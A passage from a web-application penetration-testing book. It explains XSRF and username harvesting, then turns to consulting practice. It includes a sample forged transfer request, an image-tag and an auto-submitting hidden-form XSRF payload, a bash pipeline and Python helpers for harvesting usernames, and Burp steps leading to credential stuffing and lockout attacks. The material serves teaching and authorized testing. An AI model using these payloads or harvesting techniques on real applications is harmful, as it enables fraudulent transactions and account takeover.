vulnerable application, proper timing, and a risky transaction. When the
GET or POST parameters for a transaction remain static over time and a
random or unpredictable cryptographic nonce is not included in the request,
these are what are referred to as predictable parameters. This literally means,
for example, the "username" parameter is always called "username" and
the password parameter is always called "password" and so on. However,
the values for each parameter are of course free for us to change. A typical
example of XSRF would be a GET request making a banking transfer from
one user's account to another user's account; when this request is invoked
by the legitimate user we see it as just regular functionality, but when the
legitimate user is tricked into making this request and the application accepts
it, this is an example of XSRF. For this to work, we as the attacker must first understand what a valid GET request looks like, which means performing reconnaissance on the target web application, commonly with our own test account. We proceed to leverage our browser and proxy to make the request and view the details, respectively. The request we make is the basis of our attack/payload; we merely need to alter the request to ensure money flows from and to the accounts of our choice. The important thing to keep in mind is that the victim user will be making the request for us; a request which we control entirely.
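As a sketch, a predictable transfer request might look like the following; the endpoint and parameter names here are hypothetical illustrations, not taken from any real application:

```http
GET /transfer?to=87654321&amount=1000 HTTP/1.1
Host: bank.example.com
Cookie: session=<victim's session cookie>
```

Because the parameter names never change and no per-request token is present, an attacker who has observed one such request can construct another with values of their choosing.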
The idea of moving money maliciously is a good basis for an example and
at its crux it represents a risky transaction. If we send someone an email with
a link to a Google search and the user clicks the link, this user will be the one
making the Google search request even though we defined the details of the search (the query string). This is not XSRF because it fails to meet two of the requirements: the user does not need to be authenticated to perform

this request and there is nothing inherently risky about submitting a search
request (in most cases). The reason why the victim needs to be logged in
to the application is because once authenticated, a user has the ability to
take actions with their level of privilege. This could mean updating their
password, making a financial transaction, adding a firewall rule, creating a
new user or anything that we would classify as risky. Another important
note is that while the example mentions a GET request, we can just as easily
conduct an XSRF attack via a POST request.
Once we get to the point where we have identified the details of a risky transaction and confirmed it is vulnerable to XSRF, the next step is to craft
our payload and host it somewhere or send it directly to the target victim.
If the vulnerable transaction is a GET request, we could simply craft the
suitable GET string and email it to the victim. If the victim were logged into
her account at the time of receiving the email and clicking the link in the
email, then our attack would likely work. This style of attack however would
certainly not be stealthy as the victim would be directed to the vulnerable
page in her browser and see the results of the request (and likely become
quite suspicious). An alternative way to get the victim to submit the request
would be to host the GET request on a website via an HTML image tag <img src="https://example.com/attackparameters" /> and email the victim a link
to this website. The image would not display (as it is not a valid image),
but the victim's browser would parse the HTML image tag and make the
request to example.com with the appended attack parameters. If we are able
to get the victim to browse to our attacker-controlled website, we can of
course launch other attacks against the user, but what makes XSRF special
is that it doesn't break same origin policy (SOP) yet it impacts a completely
separate domain. The reason why SOP is not being broken is because the
source of the request, from the perspective of the vulnerable application, is
the victim's browser and not our malicious website hosting the image link
or JavaScript. Mentioning JavaScript is relevant because we can use it to automatically submit an XSRF POST request, unbeknownst to the victim, as soon as he browses to our malicious website.
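A minimal sketch of such an auto-submitting page follows; the action URL and field names are hypothetical, and a real PoC (such as the one ZAP generates later in this chapter) would be tailored to the target request:

```html
<!-- hidden form targeting the vulnerable application; values are illustrative -->
<form id="xsrf" action="https://bank.example.com/transfer" method="POST">
  <input type="hidden" name="to" value="87654321">
  <input type="hidden" name="amount" value="1000">
</form>
<script>
  // submit the forged request as soon as the page loads
  document.getElementById("xsrf").submit();
</script>
```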
If our payload delivery is via a malicious string in email or hoping a victim
will browse to our website, how are we to know if the attack is successful?
XSRF is actually a blind attack in the sense that we don't immediately know
if it was successful. We can certainly monitor our server logs and see when
a victim browses to our site, but we have no visibility into the transaction
request sent to the vulnerable web application, and no indicator as to whether
the victim is even currently logged into the vulnerable web application at the

time of our attack. We can verify the attack worked by checking for the intended result, be that a new user account being added or money being sent to our bank account. While XSRF can be a powerful attack,
there are several limiting factors which expedited its removal from the top
ten list, such as the ease of implementing automated defense mechanisms
and, of course, the complexities involved with launching a successful attack.
Even with this, XSRF still remains a common vulnerability. However, an
even more common vulnerability is username harvesting.
Username harvesting, also referred to as account enumeration, is an attack which allows us to automate the harvesting of valid (currently registered or otherwise in-use) web application accounts; specifically, account usernames.
Not only is this attack very easy to perform in most situations, but it is also very easy to identify as a flaw. A common way to discover username harvesting vulnerabilities is to submit an invalid username to the login, password reset, and account creation components of the application, and observe how the application responds. We then take the exact same actions with a valid username, and note the differences in how the application responds to a valid versus an invalid username. Once again, valid means the account/username exists in the database, whereas an invalid username still meets the requirements of a username but has not been registered as a user account.
This approach is predicated upon the idea that we know at least one valid and one invalid username. We can have a high level of confidence that a username comprised of 15+ gibberish characters is probably not valid. Conversely, jsmith, [email protected], kjohnson, and other appropriately common usernames (depending on the context of the application) are good starting points for testing how the application responds to a valid username.
In modern, convenient, and user-friendly web applications, it is extremely
challenging to allow a user to create their own account or reset their password
and not be vulnerable to username harvesting. This is because the developer and business are choosing convenience over security: it is more convenient to clearly tell users when a username has already been taken than to show the generic error message that would avoid the vulnerability. Merely
communicating to the user/attacker when an account name has already been
registered is the vulnerability. Our job as attackers is to automate the guessing and confirmation of a large quantity of valid usernames, and proceed to launch additional attacks against the user accounts once armed with this knowledge.

To reiterate the flaw for clarity, imagine the account creation process for Gmail or any other public webmail service. When creating a new Gmail account, we are presented with an account creation page which includes an input for us to choose our desired username. Since the username will become our email address, and each user's email address has to be unique, Gmail will not let us choose an email address which already exists. If we try to do so, the website will clearly communicate that our desired username has already been taken, and we must choose another one. This notification is the flaw, and we can leverage it as the indicator that a given username is valid. To further attack the system, however, we need to automate the request process and response parsing, meaning submitting email addresses and extracting the error message or response code to determine if an email address is currently in use or not.
In addition to the account creation page, we want to focus on password reset pages and login pages: anywhere the application has to make a logical determination as to whether an account exists, including authenticated pages.
Launching the attack is typically best carried out with our interception proxy: Burp's Intruder or ZAP's fuzzer. This is because we can prime these tools with the appropriate request, and then grep/find the verbiage or response code indicator in the resulting HTTP response, which we will use to make note of the requested username being valid or invalid. The goal is to automate the attack and gather valid usernames. With a large quantity of valid usernames, we can proceed to launch credential stuffing or phishing attacks. Malicious attackers could use this same list of valid usernames to launch a DoS attack, effectively locking out all of the users by scripting multiple failed login attempts if the application supports account lockout.

Real-World Dialog: The "Real-World Dialog" section in the previous chapter provided insight into a username harvesting vulnerability leading to remote access into the organization, so for this section the focus will be on XSRF. XSRF was not included in the top ten list when OWASP finally released the updated 2017 version; however, I did identify the flaw years later on a production PCI application. Just because it's no longer on the top ten list doesn't mean we should not test for it. One of the features of the PCI application
allowed users to submit credit card details in order to schedule one-time or recurring payments. For an authenticated and legitimate user this was valid and useful functionality, but for an attacker this was the type of form we would want to try to attack. As the web application penetration test commenced, and while using a provisioned test account, I proceeded to execute various

injection attacks on the form's input fields, which proved to be fruitless, and eventually turned my attention to XSRF. In reviewing the applicable POST request, I was able to determine there were no apparent XSRF protection mechanisms in place, so using Burp's XSRF PoC functionality I generated an attack form and proceeded to validate the vulnerability. Attacking users of the application was not in scope for this test, but the risk seemed clear; the finding was valid and clearly communicated in the report to the client.
Less than 48 hours had elapsed since the report was shared with the client, and they had already implemented a fix in their production application. They requested I retest the finding; since the report was to be used in their PCI audit, all high-risk and medium-risk findings were likely going to be addressed. I logged back into my test account for the application and, with Burp passively watching my requests, I noticed they had implemented an anti-XSRF mechanism based on the aptly named custom parameter "anti-xsrf-token". Upon logging out and back in, and refreshing the page, I could see the randomness of the parameter's value seemed to be adequate, as was its length; at first blush they seemed to have implemented a solid fix. When generating another PoC, however, I decided to simply remove the value of the token and resubmit the request. The attack worked!
The client did a great job of setting the token, but failed to actually check that the same token (or any token) was sent back with the transaction request.
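The correct server-side check is straightforward. The following Python sketch illustrates the validation the client was missing; the function and parameter names are my own, not taken from the client's application:

```python
import hmac
from typing import Optional

def csrf_token_valid(session_token: str, submitted_token: Optional[str]) -> bool:
    """Return True only when a non-empty token was submitted AND it matches
    the token stored server-side for this session. The fix described above
    failed because the missing/empty-token case was never rejected."""
    if not session_token or not submitted_token:
        return False  # an absent or empty token must never pass
    # constant-time comparison avoids leaking information via timing
    return hmac.compare_digest(session_token, submitted_token)
```

Setting a random token and checking it on every state-changing request are two halves of the same control; implementing only the first half, as the client did, provides no protection at all.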

How to Exploit: We'll explore how to exploit username harvesting first, building off of the details previously discussed. When presented with a modern, user-friendly web application, one of the first places to look for this flaw is on the account registration page. If the application allows us to create our own username, then we simply need to attempt to register a common username, or create an account and then attempt to create another account with the same username. Our goal is to understand how the application responds when we attempt to create a duplicate account. On login and password reset pages, the same logic applies.
The first step is to identify the indicator: we need to focus on what verbiage is communicated or what response is provided when a previously registered username is submitted. Once we obtain this indicator, we proceed to automate the attack. To begin, we start with a list of candidate usernames. It is very common for usernames to be email addresses or meet a
set of requirements such as length. If the application provides a registration
page, we can either look for guidance or clarity on what constitutes a valid

username, or simply attempt to create a very short/unacceptable username to see what error message the application will provide. For instance, special
characters or numbers may not be allowed as part of the username; we want
to invoke an error message so we can learn the requirements. In this fashion we can ensure that when we work to produce a list of usernames, they will not be immediately rejected based on a failure to meet the specifications of the web
application. An example is shown in Figure 12.1.

Figure 12.1 Example website showing username requirements.

If our target application usernames are based on email addresses, then we want to devise a list based completely on valid email addresses. Gmail is a very popular free webmail service and, despite Yahoo being breached multiple times, Yahoo addresses also remain in use. It is not uncommon to see AOL addresses from time to time. There are many different free webmail services we can utilize as the domain for email addresses, as well as private and company-based email domains. Based on our reconnaissance and OSINT, we should have an idea of what type of users (the target audience) interact with the target web application, and based on this, we can try to focus on certain domains for our email address username list creation.
The three primary ways of devising a list of valid email addresses for this
purpose are: obtaining a dump of compromised/disclosed addresses, targeting
webmail providers with a username harvesting attack, and finally, creating our own list using some custom tools. The first option is fair game, the second option is likely out of scope, and the final option will be explored in greater detail. Obtaining a dump of valid email addresses can be achieved
with a single well-formatted search query which we can see in Figure 12.2
and Figure 12.3.

Figure 12.2 Search engine query to produce email address dumps.

Figure 12.3 Search engine query results showing more than we asked for.

Exploring the method of using some custom tools to create our own list will
be useful for both creating usernames based on email addresses, and general
usernames. A logical place to start is the U.S. Census as shown in Figure
12.4.

Figure 12.4 A U.S. Census page providing links to popular surnames. Helpful indeed.

Downloading and unzipping the ZIP provides access to CSV and XLSX files, and viewing the CSV shows the 162,253 most common surnames in an easy-to-digest format. We can see the output of the file download in Figure 12.5.

Figure 12.5 CSV results showing several popular surnames.


To grab the first column (the column showing the name) on the Linux CLI, a command of cat InputFile | cut -d ',' -f1 | sort -u > OutPutFile will suffice after we manually delete the first and last lines. With this output we can proceed to prepend one letter in front of each surname to produce a list of potentially valid usernames in the format of first initial, last name. We don't need to modify the email addresses in this manner, but once again using a bash script to selectively grab just the email address from the input file is desirable in order to create a list of usernames based on email addresses. Prepending one letter to each surname is accomplished with another one-liner, which we can see in Figure 12.6.

Figure 12.6 A bash for loop producing perfectly formatted usernames.
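The same expansion can also be sketched in Python. This is a sketch only: reading the surname file and writing the output are omitted, and the input is assumed to be one surname per line:

```python
import string

def make_usernames(surnames):
    """Prepend each letter a-z to each surname, producing
    first-initial + last-name candidates such as jsmith."""
    return [letter + surname.lower()
            for surname in surnames
            for letter in string.ascii_lowercase]

candidates = make_usernames(["smith", "johnson"])
print(len(candidates))  # 2 surnames x 26 letters = 52
```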


Basic math tells us that using an input list of 162,253 surnames from the 2010 Census multiplied by 26 will result in over 4.2 million usernames, which is potentially overkill for our purposes. In addition, the resulting file (UserNames) is 37MB in size, which is large enough to perhaps cause some issues when importing into our proxy tool or script. We will proceed to use a shortened version of this list to identify valid web application usernames, and will cover examples of this in the next section, but for now we need to turn our attention back to XSRF.
Exploitation of XSRF is significantly more complex, but identifying it is not. The first thing we need to do in order to identify XSRF is to determine which requests or functionality the application has that could be considered high risk. We can then simply leverage the built-in XSRF features of

Burp (in the Pro version) or ZAP to create an XSRF PoC and test the application to determine its susceptibility. Most transactions or requests that have to do with account provisioning, modification, deletion, passwords, financial transactions, PII, PCI, and the like are candidates for being classified as risky. However, we do need to take into account the context of the flaw; for instance, if the application doesn't protect against XSRF attacks for a request to POST to a blog, what is the risk? If we can couple the XSRF attack with a POST request containing PII, sensitive information, or even scripts, then arguably this might be a high-risk finding. In other words, leveraging XSRF to attack an application with a stored XSS string is likely a high risk.
Once we are browsing the application with our interception proxy running in tandem, we want to submit the request like a normal user would (this requires a test or compromised account) and then, from within ZAP, right-click the request and select "Generate Anti-CSRF Test FORM", as we can see in Figure 12.7.

Figure 12.7 ZAP's interface allowing a CSRF PoC based on a POST request.

Doing this will result in a very basic HTML page with a single submit button. When we click the submit button, the exact same request we just submitted will be submitted again. The difference is we can, and should, alter the input values to define the values we desire; for instance, moving money from one account to another or submitting a firewall rule. ZAP's generated PoC code will serve as the attack framework we will ultimately get our victim to submit for us, and while it is basic, it need not be any more complex as it will be hidden on a different page and ideally automatically submitted without the victim ever seeing it. An example of the PoC code is shown in Figure 12.8.

Figure 12.8 ZAP's XSRF PoC in raw HTML form.

With this knowledge, let's explore some examples of both username harvesting and XSRF.

Examples: Continuing with the XSRF attack, we need to host the payload somewhere as it is a POST request, and can't be sent to the victim as easily as a GET request. With the same idea in mind though, sending our victim something requiring their interaction, we can send the victim a link to a website we control. The goal would be to have the victim click the link, conceivably in an email, and be directed to our website, which will be hosting the XSRF attack and payload. Once again, identifying an XSRF vulnerability is not overly challenging, nor is creating a suitable payload, or even getting our victim to click on a link. What can be difficult, however, is timing the attack to coincide with a moment in time (and in the same default browser) when the victim is logged into the vulnerable application. This is the final piece of the attack; the victim has to be actively logged into the application we are attacking in order for our attack to be carried out. In a Windows AD environment where the application we are attacking has implemented Windows pass-through authentication, XSRF is ideal as there is a high probability the user is always logged in. In other web-based applications this is not always the case. There are some situations where we will have knowledge of ideal times to launch our targeted XSRF attack, and other situations where we need to send the attack and hope for the best, or continually host it and indiscriminately attack users (depending on our goals). We will proceed to set up the landing/attack page without regard to the latter, as it will be configured the same in either case. A seemingly harmless-looking website (Figure 12.9) can be used as the front-end for the XSRF attack.

Figure 12.9 Harmless looking website hosting XSRF attack.

However, viewing the HTML source code of the page reveals our attack, which is essentially the PoC from ZAP with a slight modification. Other than incorporating a theme and design into the HTML, we have also added JavaScript, which is responsible for automatically submitting the POST request to the vulnerable application as soon as the page finishes loading. By creating the website in this manner, the victim is presented with what appears to be a benign website while, in the background, our malicious code instructs the victim's browser to make the POST request of our choosing. We can see the source code in Figure 12.10.

Figure 12.10 HTML and JavaScript used to submit the POST request.

The caveat to this method of payload delivery is that the victim's browser
will be directed to the vulnerable application upon submitting the POST
request. By adding more code to open a new tab, submit the request from that tab, and then close the tab (or other such concepts), we could potentially make the attack more clandestine. Another option would

be to implement the POST request as a GET request, and include an HTML image tag to automatically submit the request. If GET requests are accepted, this method would not only work, but also be carried out without the victim's knowledge. Figure 12.11 shows an example of how this could be executed.

Figure 12.11 Launching an XSRF attack via a GET request and hiding any broken image icon.
These methods work well for executing the XSRF attack in different circumstances, and can be modified to meet the needs of the attacker. Let's again refocus our attention on some examples of exploiting username harvesting.
Recall that the goal of a username harvesting attack is to identify, with confidence and in an automated way, valid application accounts. Ultimately we will try a credential stuffing attack, but initially we are not trying to log in to any of the accounts. In practice, most businesses (and by extension, web applications) choose to communicate to end users when a provided username is incorrect, and we need to be able to identify and extract this message from the HTTP response to our login, account creation, forgotten password, or other suitable request. Several examples of this behavior are shown in Figure 12.12.

Figure 12.12 Common error messages confirming the username is valid.



In looking at the error messages, the verbiage is clear and we can use this to confirm a submitted username is valid. Using Burp and our browser, we will navigate to our target application, proceed to make an initial account creation request, and view the resulting HTML. Next, we will send the previous request to Intruder, choose the "Sniper" attack, and populate the payloads tab with a single set of usernames. The usernames should be provided in the file in the format of one username per line. Looking more closely at the initial Sniper attack, we need to clear all of the predefined injection points and choose the single point where the submitted username resides, as this single parameter value is where we need to focus the attack. We can see this in Figure 12.13, whereas Figure 12.14 shows the options of applicable payloads.

Figure 12.13 Using Burp's Sniper option within Intruder.

Figure 12.14 Uploading our file containing usernames to Burp's payload section.

Once we properly choose the injection point and successfully input the list of usernames we want to test, we proceed to the "Options" tab to set up a "Grep - Match" rule, which will serve as our indicator of a valid username. We leverage the error message previously discovered, and populate the rule with this string as long as it is unique and will only be displayed when a valid username is submitted. Using the string "Choose a different address" should suffice for this example, as we can see in Figure 12.15.

Figure 12.15 Using Burp's Grep - Match option to serve as an indicator of success.

Next, we launch the attack by clicking "Start Attack" in the top right-hand corner of any Intruder tab. The results of the attack are shown in Figure
12.16.

Figure 12.16 Viewing results of the Intruder attack noting valid usernames.

Note that the free version of Burp does not allow us to save the results or configure granular timing for the attack, and it throttles our requests; all of these reasons make using the free version almost useless in a professional engagement, but adequate for testing. We could easily reproduce this attack with a custom script or ZAP, but we do want to have a way to save the results so we have a definitive list of valid usernames.
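A custom script along those lines only needs to replay the request for each candidate username and grep the response. The core classification logic can be sketched in Python as below; the indicator string matches the earlier example, while the request-sending code (with, e.g., the `requests` library) is omitted because the endpoint and parameter names depend entirely on the target:

```python
VALID_INDICATOR = "Choose a different address"  # duplicate-account error seen earlier

def username_is_valid(response_body: str) -> bool:
    """A response containing the duplicate-account error message means
    the submitted username is already registered."""
    return VALID_INDICATOR in response_body

def harvest(responses):
    """Given a mapping of candidate username -> HTTP response body,
    return the sorted list of usernames confirmed as valid."""
    return sorted(user for user, body in responses.items()
                  if username_is_valid(body))
```

In a live engagement we would populate the response map by submitting each candidate to the registration endpoint and write the harvested list to disk, which sidesteps the save-results limitation of the free version of Burp noted above.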
Depending on the verbiage to grep for, the format of the usernames, and the like, the complexity of getting the attack to work will be influenced heavily by the way the web application has been implemented. While there are not usually specific security features aimed at preventing this attack, we will at times have to contend with session timeouts, cookie reuse issues, and excessive request filtering protections, which will slow down our attack but not stop it. The next logical course of action, once we have a quantity of valid usernames, is to proceed with a credential stuffing attack, which works the same way as the username harvesting attack in principle, the only differences being two sets of payloads and a different attack type: valid usernames, password guesses, and a "cluster bomb" Intruder attack type. In addition, depending on the rules of engagement and needs of the business, we can

leverage our vast quantity of usernames to launch spear phishing attacks and, in rarer circumstances, perhaps lock out user accounts.

Link to hands-on portion: https://tptgtwa.com/owaspbeyond


Root Cause and Conclusion: The root cause of XSRF is a lack of transaction validation. Modern development frameworks now support this functionality, and implementing proper protections is not exceedingly challenging; even adding the "SameSite" flag to cookies would help remediate this flaw. Adding a flag to a cookie and enabling framework security options alone, however, don't solve the problem completely and consistently, nor are they routinely implemented. For these reasons, XSRF is a prominent finding on many tests. However, XSRF can be difficult to successfully exploit in a consistent manner as it requires end-user interaction and proper authorization/permissions associated with the victim's account, as well as proper timing. We always want to test for this flaw, and when we are allowed and able to exploit it, XSRF can lead to significant impact.
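For reference, a session cookie hardened with this flag might be issued with a header such as the following (cookie name and value are illustrative):

```http
Set-Cookie: session=r4nd0mV4lu3; Secure; HttpOnly; SameSite=Strict
```

SameSite=Strict tells the browser not to attach the cookie to any cross-site request, while SameSite=Lax still permits top-level GET navigations; neither setting replaces proper server-side token validation.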
Username harvesting flaws commonly go without being remediated, and the finding is either disputed as not a risk or accepted as part of business operations. Our risk ranking for this finding, like other findings, needs to be context-based and commensurate with the proven level of risk it poses to the business and its users. The reason this finding is so prevalent is because it is exceedingly challenging to create a user-friendly application and not clearly convey when a user account has already been taken (during the account creation process) or, in some cases, tell the user why their login/password reset request is failing. While this is a security shortcoming, organizations typically choose to leave the flaw in place rather than risk alienating or otherwise annoying users. The problem with this approach (which is good for us) is that protecting accounts and access to the application is only as good as the combined strength of user and application controls. If the application only allows for eight-character passwords, for instance, how can a user ever hope to have a strong password? Likewise, if the application does not enforce two-factor authentication and/or complex passwords, there are always going to be users who choose weak credentials. This is why OWASP #2 is where it is on the list, and why attacks like username harvesting can be a high-risk issue.
Chapter 13

Testing as a Consultant and Adding Value
Working in-house as a penetration tester has certain advantages over consulting, but we want to approach every engagement as if we are a consultant, to maintain a high level of professionalism and not miss details. In this capacity, we treat every business/engagement like a client/contract.
The way we approach a penetration test should be the same regardless of the client, and consists of several important elements: scoping, rules of engagement, and expectations. Within each of these elements we delve into more granular components.
The purpose of scoping is to make sure we are testing what the client needs to have tested, but it is also our responsibility to ensure that what is tested encompasses all relevant aspects of the application. This could mean taking into account subdomains and affiliated services/APIs as part of the extended scope of testing. In addition, it is important to discuss with the client the very real possibility of causing harm to the web application, whether via a degradation of service, a potential DoS, or corrupted data. We want to make sure these points are clearly communicated, and that the client takes the appropriate actions to back up data before testing ensues. When speaking with the client, one of the most important questions to ask is, "What are the goals of testing?" A good answer to this question can help guide our efforts in what we test and how we go about trying to gain access to the most critical information, and this will vary significantly from engagement to engagement.

The rules of engagement are essentially the guiding protocols that help us
focus our efforts on the right areas of testing and ensure we don't target
systems which are not in scope. Thus, conversations about scoping and how
we engage the client are similar in nature, and both are discussed during a
kick-off call prior to testing. As part of the conversation around the rules of
engagement, we want to verify our primary and secondary points of contact
(who do we call in the event the website becomes unresponsive?). Agreeing
on a regular cadence of communications is also advisable, where we let the
client know when testing is starting and when we are finished for the day.
We also need to determine what times of the day/week we are going to be
testing the web application, as well as whether client-side attacks and social
engineering are in scope.
Setting expectations with the client is one of the most important aspects
of the entire engagement, as what we think constitutes a great test may not be
what the client had in mind. For this reason, we want to be clear in our actions
and communicate what we are going to do, how we are going to do it, and what
the deliverable is going to include, and then execute on the agreed course of action.
Extra care needs to be taken if the client or the application has never dealt
with a penetration test in the past. There is a significant difference between
running an automated scanning tool and performing a manual inspection of
security controls with a mindset focused on bypassing those controls and
forcefully gaining access to resources and information. Because of this, while
the application may undergo regular scanning, we need to help the client
understand the risks associated with testing as well as the approach, goals,
and benefits.
Consider the progression of an engagement: engaging a client, conducting
the kick-off call (discussing all of the aforementioned topics), and conducting
the test to completion. Finally, we move on to writing the report.
In many ways the deliverable, the final report, is the most important ele-
ment of a penetration test. Setting expectations is very important; providing
a tangible document including all of our hard work, findings, and details on
exploitation, however, is the lasting impression we leave with the client. For
this reason (and know that this report will be shared internally and scruti-
nized by our peers, including other penetration testers, auditors, management,
and executives) we want to make sure our report is the best it can be. The
elements which comprise an excellent report are an easy-to-understand ex-
ecutive summary; a detailed narrative about what was done and how it was
accomplished; and detailed, reproducible findings with screenshots,
clear descriptions of each flaw with a risk ranking, and recommended remedia-
tions. The report also needs to include confirmation of the scope of targets, a
robust description of the methodology used to test, a table of contents,
information regarding the testing dates and points of contact, and an appendix
with automated scan results and other applicable documentation.
While this has been discussed intermittently throughout the book, know
that every finding is context-specific, and assigning default CVSS scores and
risk ratings to findings is not sufficient. We need to take into account the
demonstrated risk of the identified flaw and produce a custom risk score
for each vulnerability we find, regardless of exploitation. One final note on
the deliverable of the report: prior to sending, discuss how the report is
to be delivered (encrypted, GPG, shared via the cloud, emailed). We don't
want detailed paths to exploitation of the client environment to be shared
unencrypted.
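For context on why a default score is only a starting point: the CVSS v3.1 base score is a fixed formula over the base metrics, so two very different applications can yield the identical number. A minimal sketch of the scope-unchanged case is below (temporal and environmental metrics, and the scope-changed variant, are omitted); the demonstrated, environment-specific risk we report may justifiably differ from this computed value:

```python
import math

# CVSS v3.1 base-metric weights (Scope: Unchanged).
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}   # Attack Vector
AC = {"L": 0.77, "H": 0.44}                         # Attack Complexity
PR = {"N": 0.85, "L": 0.62, "H": 0.27}              # Privileges Required
UI = {"N": 0.85, "R": 0.62}                         # User Interaction
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}              # C/I/A impact

def roundup(x):
    """Spec-defined rounding to one decimal place, always upward."""
    i = int(round(x * 100000))
    return i / 100000 if i % 10000 == 0 else (math.floor(i / 10000) + 1) / 10

def base_score(av, ac, pr, ui, c, i, a):
    iss = 1 - (1 - CIA[c]) * (1 - CIA[i]) * (1 - CIA[a])
    impact = 6.42 * iss
    exploitability = 8.22 * AV[av] * AC[ac] * PR[pr] * UI[ui]
    return 0.0 if impact <= 0 else roundup(min(impact + exploitability, 10))

# Unauthenticated SQL injection: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
print(base_score("N", "L", "N", "N", "H", "H", "H"))  # 9.8
```

The same vector always prints 9.8, whether the database holds test data or cardholder data; that gap is exactly what our custom risk ranking should close.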
Adding value as an in-house penetration tester involves knowing our en-
vironment and establishing relationships with other teams. In fact, these are
the two main advantages in-house penetration testers have over outside con-
sultants. We want to maximize the benefits of knowing what protections are
in place, how code is deployed, what servers are running which software,
where PII resides, and the like to, in effect, conduct a white box penetration
test focusing on what we already know to be the weakest links.
The other benefit and way we can add value in-house is by talking to
our counterparts on the development team, our security champions, or like-
minded, security-conscious developers. Ideally, we want to work together to
address security shortcomings, but also to ensure a smooth test and to stay
abreast of new software being released, new technology being researched, and
timelines for incorporating fixes into the codebase. In a DevSecOps environ-
ment we can also ensure our automated scanning and other security processes
are taking place, providing value and constantly being tuned to the appli-
cations in the pipeline. This concept of providing value is a nod to the fact
that security is a cost center, and one of the main functions of this cost center
is to help reduce risk and keep costs lower by reducing threats and attack sur-
face, and ultimately preventing a breach or similar unwanted consequences.
We can work to accomplish these goals by gaining a deep understanding of
the environment and constraints of the business. With this knowledge we can
proceed to recommend the best course of action to protect the business. From
a consultant perspective, we add value by being easy to work with, meeting
expectations, and delivering a thorough, high-quality penetration test and
accompanying report. Although technical acumen is a requirement, there is
more to penetration testing than tools, and as the human behind the tools, we are
in the best position to provide value when we have a deep understanding
of vulnerabilities, how to exploit them, and how to do so in a professional
manner.
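One concrete way the automated scanning mentioned above shows up in a pipeline is a gate that fails the build when a scan report contains high-risk findings. The report format and risk labels below are hypothetical; real scanners (OWASP ZAP, Nikto, and others) each emit their own formats that you would parse instead:

```python
import json

# Hypothetical scanner output; real tools emit their own report formats.
SAMPLE_REPORT = json.dumps({
    "findings": [
        {"name": "Missing HSTS header", "risk": "Low"},
        {"name": "Reflected XSS", "risk": "High"},
    ]
})

def gate(report_json: str, blocking_risks=("High", "Critical")) -> int:
    """Return a pipeline exit code: non-zero if any blocking finding exists."""
    findings = json.loads(report_json)["findings"]
    blockers = [f for f in findings if f["risk"] in blocking_risks]
    for f in blockers:
        print(f"BLOCKING {f['risk']}: {f['name']}")
    return 1 if blockers else 0

print("exit code:", gate(SAMPLE_REPORT))  # exit code: 1
```

A gate like this is deliberately dumb; its value comes from the tuning work described above, so that blocked builds reflect real risk rather than scanner noise.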
The last brief topic to discuss is that of professionalism and ethical test-
ing. As mentioned, reading this book will not make you an expert, but cou-
pled with persistent practice, applying the concepts, and honing the tech-
niques/tools, it will eventually lead to mastery. When this occurs, you will be
in the .00001% of people with this skill set. I think the Linux sudo lecture
does a good job of setting the expectation of how to act, how to responsibly
wield this knowledge, and how to keep us professionals differentiated from
attackers: "Respect the privacy of others. Think before you type. With great
power comes great responsibility."
I hope you enjoyed the book!
About the Author
Serge Borso is the founder and CEO of SpyderSec, an information security
consulting organization specializing in penetration testing, security awareness
training, and OSINT. He is also the president of the Denver OWASP chapter,
which is among the largest chapters in the world.
He is an expert in a variety of information security fields, having served in
many roles in the IT and security industries over the past fifteen years. As an
active member of the security community, Serge has trained over one thou-
sand students at various public/private training events, presents regularly
at speaking engagements, and his quotes can be read in numerous industry
publications. Serge holds a B.S. in IT and an M.S. in computer science from Col-
orado Technical University, has numerous industry certifications, and is also
an instructor with the SANS Institute.

Index

API, 6, 22, 62, 72, 73, 75, 78, 92, 95, 119
Black Box, 6, 146
Burp Suite, ix, 17, 21, 32, 36, 39, 60, 81, 116, 129, 140, 143, 175, 192, 193
Command Injection, 28
Cookies, 7, 32, 39, 89, 122, 125, 126, 131–133, 175, 194
Cracking, 47–49, 94
Credential Stuffing, 35, 39, 110, 168, 177, 191
Denial of Service, 2, 75
Deserialization, 137–139, 143, 147, 148
Google Dorks, 82, 84, 107, 114, 186
HIPAA, 5
HITRUST, 5
HSTS, 44, 45, 49, 53
JWT, 90, 92, 94
Logging and Monitoring, 167, 168, 170, 177
Nikto, 155–158, 174
nmap, 102, 109, 167, 172
NoSQL Injection, 22
PCI, 5, 7, 11, 35, 45, 183, 184, 188
Programming Languages, 32, 77, 126, 130, 133, 144
Rules of Engagement, 5, 7, 44, 122, 168, 170, 196
SQL Injection, 9, 10, 12, 15, 17, 19
sqlmap, 19
WAF, 3, 5, 7, 35, 62, 99, 153, 170, 171, 173
XSRF, 121, 179–181, 183, 187, 189, 194
XSS, 107, 119, 121, 123, 126, 131, 136, 159
XXE, 55, 58, 59, 62, 68, 72, 76, 139
ZAP, ix, 63, 65, 67, 70, 88, 92

Recent Titles in the Artech House
Computer Security Series
Rolf Oppliger, Series Editor

Bluetooth Security, Christian Gehrmann, Joakim Persson, and Ben Smeets
Computer Forensics and Privacy, Michael A. Caloyannides
Computer and Intrusion Forensics, George Mohay, et al.
Contemporary Cryptography, Second Edition, Rolf Oppliger
Cryptography for Security and Privacy in Cloud Computing,
Stefan Rass and Daniel Slamanig
Defense and Detection Strategies Against Internet Worms,
Jose Nazario
Demystifying the IPsec Puzzle, Sheila Frankel
Developing Secure Distributed Systems with CORBA, Ulrich Lang and
Rudolf Schreiner
Electric Payment Systems for E-Commerce, Second Edition,
Donal O'Mahony, Michael Peirce, and Hitesh Tewari
Engineering Safe and Secure Software Systems, C. Warren Axelrod
Evaluating Agile Software Development: Methods for Your
Organization, Alan S. Koch
Implementing Electronic Card Payment Systems, Cristian Radu
Implementing the ISO/IEC 27001 Information Security Management
System Standard, Edward Humphreys
Implementing Security for ATM Networks, Thomas Tarman and
Edward Witzke
Information Hiding, Stefan Katzenbeisser and
Fabien Petitcolas, editors
Internet and Intranet Security, Second Edition, Rolf Oppliger
Introduction to Identity-Based Encryption, Luther Martin
Java Card for E-Payment Applications, Vesna Hassler,
Martin Manninger, Mikail Gordeev, and Christoph Müller
Multicast and Group Security, Thomas Hardjono and
Lakshminath R. Dondeti
Non-repudiation in Electronic Commerce, Jianying Zhou
Outsourcing Information Security, C. Warren Axelrod
The Penetration Tester’s Guide to Web Applications, Serge Borso
